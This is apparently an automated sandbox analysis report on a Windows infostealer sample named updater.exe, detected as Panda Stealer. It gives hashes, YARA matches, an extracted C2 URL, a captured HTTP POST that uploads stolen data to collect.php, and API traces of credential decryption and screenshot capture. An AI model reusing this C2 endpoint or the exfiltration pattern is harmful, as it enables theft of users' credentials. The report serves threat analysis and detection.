Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
updater.exe

Overview

General Information

Sample Name:updater.exe
Analysis ID:1266489
MD5:5b7111ae32c04c641c56e81a6293ec48
SHA1:77331d9725c41635d6d449414c8a0d4ee00fac63
SHA256:4cedab343fc4581149b13b7f6fd6532fa2c437550dee42926b37a93c6b5997f9
Infos:

Detection

Panda Stealer
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected Panda Stealer
Machine Learning detection for sample
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Searches the installation path of Mozilla Firefox
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to read the PEB
PE / OLE file has an invalid certificate
Uses Microsoft's Enhanced Cryptographic Provider
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Classification

  • System is w7x64
  • updater.exe (PID: 2364 cmdline: C:\Users\user\Desktop\updater.exe MD5: 5B7111AE32C04C641C56E81A6293EC48)
  • cleanup
{"C2 url": "http://f0837288.xsph.ru", "Version": "1.11"}
SourceRuleDescriptionAuthorStrings
updater.exeJoeSecurity_PandaStealerYara detected Panda StealerJoe Security
    updater.exeMALWARE_Win_AlfonosoDetects Alfonoso / Shurk / HunterStealer infostealerditekSHen
    • 0x96a6c:$s1: %s\etilqs_
    • 0x96bcc:$s2: SELECT name, rootpage, sql FROM '%q'.%s
    • 0x97338:$s2: SELECT name, rootpage, sql FROM '%q'.%s
    • 0x96b80:$s3: %s-mj%08X
    • 0x92e7c:$s8: recursive_directory_iterator
    • 0x92e9a:$s8: recursive_directory_iterator
    • 0x92eb8:$s8: recursive_directory_iterator
    • 0x96194:$s9: 2E 7A 69 70 00 00 00 00 2E 7A 6F 6F 00 00 00 00 2E 61 72 63 00 00 00 00 2E 6C 7A 68 00 00 00 00 2E 61 72 6A 00 00 00 00 2E 67 7A 00 2E 74 67 7A 00 00 00 00
    • 0x96a84:$s11: :memory:
    • 0x92f28:$s12: current_path()
    • 0x96b6c:$s13: vtab:%p:%p
    updater.exeMALWARE_Win_PandaStealerDetects Panda StealerditekSHen
    • 0x96228:$s2: user.config
    • 0x96a6c:$s4: %s\etilqs_
    • 0xa18a0:$s7: .?AV?$_Ref_count_obj2@U_Recursive_dir_enum_impl@filesystem@std@@@
    • 0x96ea8:$s8: UPDATE %Q.%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr
    • 0x96d8d:$s9: || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (
    updater.exeWindows_Trojan_Pandastealer_8b333e76unknownunknown
    • 0x9636c:$a1: ] - [user:
    • 0x96378:$a2: [-] data unpacked failed
    • 0x96350:$a3: [+] data unpacked
    • 0x96288:$a4: \history\
    • 0x963d0:$a5: PlayerName
    SourceRuleDescriptionAuthorStrings
    00000001.00000000.988088444.0000000001437000.00000002.00000001.01000000.00000003.sdmpWindows_Trojan_Pandastealer_8b333e76unknownunknown
    • 0x1096c:$a1: ] - [user:
    • 0x10978:$a2: [-] data unpacked failed
    • 0x10950:$a3: [+] data unpacked
    • 0x10888:$a4: \history\
    • 0x109d0:$a5: PlayerName
    00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpWindows_Trojan_Pandastealer_8b333e76unknownunknown
    • 0x1096c:$a1: ] - [user:
    • 0x10978:$a2: [-] data unpacked failed
    • 0x10950:$a3: [+] data unpacked
    • 0x10888:$a4: \history\
    • 0x109d0:$a5: PlayerName
    Process Memory Space: updater.exe PID: 2364JoeSecurity_PandaStealerYara detected Panda StealerJoe Security
      Process Memory Space: updater.exe PID: 2364Windows_Trojan_Pandastealer_8b333e76unknownunknown
      • 0xf305:$a1: ] - [user:
      • 0xf3a2:$a1: ] - [user:
      • 0x313cd:$a1: ] - [user:
      • 0x3146a:$a1: ] - [user:
      • 0xf311:$a2: [-] data unpacked failed
      • 0xf3ad:$a2: [-] data unpacked failed
      • 0x313d9:$a2: [-] data unpacked failed
      • 0x31475:$a2: [-] data unpacked failed
      • 0xf2f3:$a3: [+] data unpacked
      • 0x198d7:$a3: [+] data unpacked
      • 0x27cd5:$a3: [+] data unpacked
      • 0x313bb:$a3: [+] data unpacked
      • 0xef74:$a4: \history\
      • 0x3103c:$a4: \history\
      • 0xf341:$a5: PlayerName
      • 0x31409:$a5: PlayerName
      SourceRuleDescriptionAuthorStrings
      1.0.updater.exe.13b0000.0.unpackJoeSecurity_PandaStealerYara detected Panda StealerJoe Security
        1.0.updater.exe.13b0000.0.unpackMALWARE_Win_AlfonosoDetects Alfonoso / Shurk / HunterStealer infostealerditekSHen
        • 0x96a6c:$s1: %s\etilqs_
        • 0x96bcc:$s2: SELECT name, rootpage, sql FROM '%q'.%s
        • 0x97338:$s2: SELECT name, rootpage, sql FROM '%q'.%s
        • 0x96b80:$s3: %s-mj%08X
        • 0x92e7c:$s8: recursive_directory_iterator
        • 0x92e9a:$s8: recursive_directory_iterator
        • 0x92eb8:$s8: recursive_directory_iterator
        • 0x96194:$s9: 2E 7A 69 70 00 00 00 00 2E 7A 6F 6F 00 00 00 00 2E 61 72 63 00 00 00 00 2E 6C 7A 68 00 00 00 00 2E 61 72 6A 00 00 00 00 2E 67 7A 00 2E 74 67 7A 00 00 00 00
        • 0x96a84:$s11: :memory:
        • 0x92f28:$s12: current_path()
        • 0x96b6c:$s13: vtab:%p:%p
        1.0.updater.exe.13b0000.0.unpackMALWARE_Win_PandaStealerDetects Panda StealerditekSHen
        • 0x96228:$s2: user.config
        • 0x96a6c:$s4: %s\etilqs_
        • 0xa18a0:$s7: .?AV?$_Ref_count_obj2@U_Recursive_dir_enum_impl@filesystem@std@@@
        • 0x96ea8:$s8: UPDATE %Q.%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr
        • 0x96d8d:$s9: || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (
        1.0.updater.exe.13b0000.0.unpackWindows_Trojan_Pandastealer_8b333e76unknownunknown
        • 0x9636c:$a1: ] - [user:
        • 0x96378:$a2: [-] data unpacked failed
        • 0x96350:$a3: [+] data unpacked
        • 0x96288:$a4: \history\
        • 0x963d0:$a5: PlayerName
        1.2.updater.exe.13b0000.0.unpackJoeSecurity_PandaStealerYara detected Panda StealerJoe Security
          Click to see the 3 entries
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 00000001.00000000.988088444.0000000001437000.00000002.00000001.01000000.00000003.sdmpMalware Configuration Extractor: Panda Stealer {"C2 url": "http://f0837288.xsph.ru", "Version": "1.11"}
          Source: updater.exeVirustotal: Detection: 84%Perma Link
          Source: updater.exeReversingLabs: Detection: 91%
          Source: updater.exeAvira: detected
          Source: updater.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013C2705 CryptUnprotectData,CryptUnprotectData,1_2_013C2705
          Source: updater.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: updater.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013F6107 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,1_2_013F6107
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013F61B5 GetLongPathNameW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose,1_2_013F61B5
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013F6127 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,1_2_013F6127
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Roaming\Adobe\Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\Jump to behavior

          Networking

          barindex
          Source: Malware configuration extractorURLs: http://f0837288.xsph.ru
          Source: Joe Sandbox ViewIP Address: 141.8.192.151 141.8.192.151
          Source: Joe Sandbox ViewIP Address: 141.8.192.151 141.8.192.151
          Source: updater.exe, 00000001.00000002.1124810776.0000000008E6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
          Source: updater.exe, 00000001.00000002.1124428852.000000000018D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c/s
          Source: updater.exe, 00000001.00000002.1124403437.0000000000026000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobede
          Source: updater.exe, 00000001.00000002.1124810776.0000000008E6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0K
          Source: TTFJYWWSOQ.CMMEDGCGG.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: TTFJYWWSOQ.CMMEDGCGG.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: TTFJYWWSOQ.CMMEDGCGG.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: TTFJYWWSOQ.CMMEDGCGG.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: TTFJYWWSOQ.CMMEDGCGG.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: TTFJYWWSOQ.CMMEDGCGG.1.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: TTFJYWWSOQ.CMMEDGCGG.1.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: updater.exe, 00000001.00000002.1124810776.0000000008E6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
          Source: TTFJYWWSOQ.CMMEDGCGG.1.drString found in binary or memory: https://www.google.com/favicon.ico
          Source: unknownHTTP traffic detected: POST /collect.php HTTP/1.1Content-Type: multipart/form-data; boundary=SendFileZIPBoundaryUser-Agent: uploaderHost: f0837288.xsph.ruContent-Length: 1638104Connection: Keep-AliveCache-Control: no-cache
          Source: unknownDNS traffic detected: queries for: f0837288.xsph.ru

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Source: Yara matchFile source: updater.exe, type: SAMPLE
          Source: Yara matchFile source: 1.0.updater.exe.13b0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.updater.exe.13b0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: Process Memory Space: updater.exe PID: 2364, type: MEMORYSTR
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013CB7C3 GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,EnterCriticalSection,LeaveCriticalSection,DeleteDC,DeleteObject,ReleaseDC,1_2_013CB7C3

          System Summary

          barindex
          Source: updater.exe, type: SAMPLEMatched rule: Detects Alfonoso / Shurk / HunterStealer infostealer Author: ditekSHen
          Source: updater.exe, type: SAMPLEMatched rule: Detects Panda Stealer Author: ditekSHen
          Source: updater.exe, type: SAMPLEMatched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown
          Source: 1.0.updater.exe.13b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Alfonoso / Shurk / HunterStealer infostealer Author: ditekSHen
          Source: 1.0.updater.exe.13b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Panda Stealer Author: ditekSHen
          Source: 1.0.updater.exe.13b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown
          Source: 1.2.updater.exe.13b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Alfonoso / Shurk / HunterStealer infostealer Author: ditekSHen
          Source: 1.2.updater.exe.13b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Panda Stealer Author: ditekSHen
          Source: 1.2.updater.exe.13b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown
          Source: 00000001.00000000.988088444.0000000001437000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown
          Source: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown
          Source: Process Memory Space: updater.exe PID: 2364, type: MEMORYSTRMatched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown
          Source: updater.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: updater.exe, type: SAMPLEMatched rule: MALWARE_Win_Alfonoso snort2_sid = 920102, author = ditekSHen, description = Detects Alfonoso / Shurk / HunterStealer infostealer, clamav_sig = MALWARE.Win.Trojan.Alfonso, snort3_sid = 920100
          Source: updater.exe, type: SAMPLEMatched rule: MALWARE_Win_PandaStealer author = ditekSHen, description = Detects Panda Stealer
          Source: updater.exe, type: SAMPLEMatched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13
          Source: 1.0.updater.exe.13b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Alfonoso snort2_sid = 920102, author = ditekSHen, description = Detects Alfonoso / Shurk / HunterStealer infostealer, clamav_sig = MALWARE.Win.Trojan.Alfonso, snort3_sid = 920100
          Source: 1.0.updater.exe.13b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_PandaStealer author = ditekSHen, description = Detects Panda Stealer
          Source: 1.0.updater.exe.13b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13
          Source: 1.2.updater.exe.13b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Alfonoso snort2_sid = 920102, author = ditekSHen, description = Detects Alfonoso / Shurk / HunterStealer infostealer, clamav_sig = MALWARE.Win.Trojan.Alfonso, snort3_sid = 920100
          Source: 1.2.updater.exe.13b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_PandaStealer author = ditekSHen, description = Detects Panda Stealer
          Source: 1.2.updater.exe.13b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13
          Source: 00000001.00000000.988088444.0000000001437000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13
          Source: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13
          Source: Process Memory Space: updater.exe PID: 2364, type: MEMORYSTRMatched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013C04AD1_2_013C04AD
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013BC9EC1_2_013BC9EC
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013CAF641_2_013CAF64
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013C91511_2_013C9151
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013C70091_2_013C7009
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013C30951_2_013C3095
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013B92941_2_013B9294
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013B35071_2_013B3507
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013BB6531_2_013BB653
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013C1BD61_2_013C1BD6
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013B7D351_2_013B7D35
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013C3E7B1_2_013C3E7B
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_014261291_2_01426129
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0141A3401_2_0141A340
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0141836D1_2_0141836D
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0142A3E31_2_0142A3E3
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013B85471_2_013B8547
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013C24311_2_013C2431
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0141C6F61_2_0141C6F6
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0142E93F1_2_0142E93F
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0141493E1_2_0141493E
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013D0B701_2_013D0B70
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0142EA5F1_2_0142EA5F
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_01410F701_2_01410F70
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013F0EF61_2_013F0EF6
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0142CE9E1_2_0142CE9E
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013D90821_2_013D9082
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_014253C41_2_014253C4
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_014312001_2_01431200
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013B72BC1_2_013B72BC
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013F17021_2_013F1702
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013E364A1_2_013E364A
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013E38181_2_013E3818
          Source: C:\Users\user\Desktop\updater.exeCode function: String function: 0140E2F3 appears 61 times
          Source: C:\Users\user\Desktop\updater.exeCode function: String function: 0140E2BF appears 80 times
          Source: C:\Users\user\Desktop\updater.exeCode function: String function: 0140E620 appears 39 times
          Source: C:\Users\user\Desktop\updater.exeCode function: String function: 01430CFC appears 75 times
          Source: C:\Users\user\Desktop\updater.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install DirectoryJump to behavior
          Source: updater.exeStatic PE information: invalid certificate
          Source: C:\Users\user\Desktop\updater.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\updater.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: updater.exeVirustotal: Detection: 84%
          Source: updater.exeReversingLabs: Detection: 91%
          Source: updater.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\updater.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\Desktop\updater.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile created: C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEEJump to behavior
          Source: classification engineClassification label: mal92.troj.spyw.winEXE@1/5@1/1
          Source: updater.exe, updater.exe, 00000001.00000000.988088444.0000000001437000.00000002.00000001.01000000.00000003.sdmp, updater.exe, 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: updater.exe, 00000001.00000000.988088444.0000000001437000.00000002.00000001.01000000.00000003.sdmp, updater.exe, 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
          Source: updater.exe, updater.exe, 00000001.00000000.988088444.0000000001437000.00000002.00000001.01000000.00000003.sdmp, updater.exe, 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013D39FA GetLastError,FormatMessageA,1_2_013D39FA
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013C6592 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,OpenProcess,QueryFullProcessImageNameA,Process32Next,Process32Next,1_2_013C6592
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013B433F LoadResource,LockResource,SizeofResource,1_2_013B433F
          Source: C:\Users\user\Desktop\updater.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Windows\SysWOW64\RichEd32.dllJump to behavior
          Source: updater.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: updater.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0140E299 push ecx; ret 1_2_0140E2AC
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0140E664 push ecx; ret 1_2_0140E676
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_01430D1A push eax; ret 1_2_01430D50
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_01430D9A push ecx; ret 1_2_01430DA9
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_01430CFC push eax; ret 1_2_01430D18
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013CA518 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,1_2_013CA518
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013B3507 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,1_2_013B3507
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exe TID: 1284Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_014124FE VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect,1_2_014124FE
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013F6107 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,1_2_013F6107
